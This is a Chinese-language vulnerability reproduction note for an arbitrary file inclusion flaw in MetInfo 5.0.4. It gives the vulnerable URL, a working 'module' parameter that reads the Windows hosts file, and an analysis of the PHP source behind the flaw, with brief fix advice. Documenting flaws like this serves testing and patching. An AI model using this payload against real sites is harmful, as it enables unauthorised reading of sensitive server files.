1.1漏洞描述
漏洞编号 | ———— |
漏洞类型 | 文件包含 |
漏洞等级 | ⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐ |
漏洞环境 | windows |
攻击方式 |
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4 版本中的 /metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
1.2漏洞等级
高危
1.3影响版本
metinfo 5.0.4
1.4漏洞复现
1.4.1.基础环境
组件 | 版本 |
---|---|
OS | Microsoft Windows Server 2016 Standard |
Web Server | phpStudy 2016 |
MetInfo | 5.0.4 |
开启: metinfo 5.0.4
1.4.2.漏洞点
/metinfo_5.0.4/about/index.php?fmodule=7
1.4.3.测试
&module=c:/windows/system32/drivers/etc/hosts
成功获取hosts信息,证明漏洞存在
1.4.4 源码分析
根据index.php我们可以看到文件包含,主要包含$module.(变量,动态包含,存在漏洞)
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
$filpy = basename(dirname(__FILE__));
$fmodule=1;
require_once '../include/module.php';
//echo $fmodule;
//echo "<hr >";
//echo $module;
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>
module.php代码关键部分, 这里只判断了$fmodule!=7进入if分支,没有判断$fmodule=7,而且带码还包含了common.inc.(这里的代码不完全,建议下载metinfo 5.0.4)
if($fmodule!=7){
if($mdle==100)$mdle=3;
if($mdle==101)$mdle=5;
$module = $modulefname[$mdle][$mdtp];
if($module==NULL){okinfo('../404.html');exit();}
if($mdle==2||$mdle==3||$mdle==4||$mdle==5||$mdle==6){
if($fmodule==$mdle){
$module = $modulefname[$mdle][$mdtp];
}
else{
okinfo('../404.html');exit();
}
}
else{
if($list){
okinfo('../404.html');exit();
}
else{
$module = $modulefname[$mdle][$mdtp];
}
}
if($mdle==8){
if(!$id)$id=$class1;
$module = '../feedback/index.php';
}
}
?>
common.inc下面这几行代码会将GPC参数传递过来的变量全部存储成变量,进行执行。
过程:
&module=c:/windows/system32/drivers/etc/hosts| |
$module = $module值
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
所以我们传入&module=c:/windows/system32/drivers/etc/hosts则会执行,查看到hosts信息
1.5深度利用
1.5.1
暂无
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备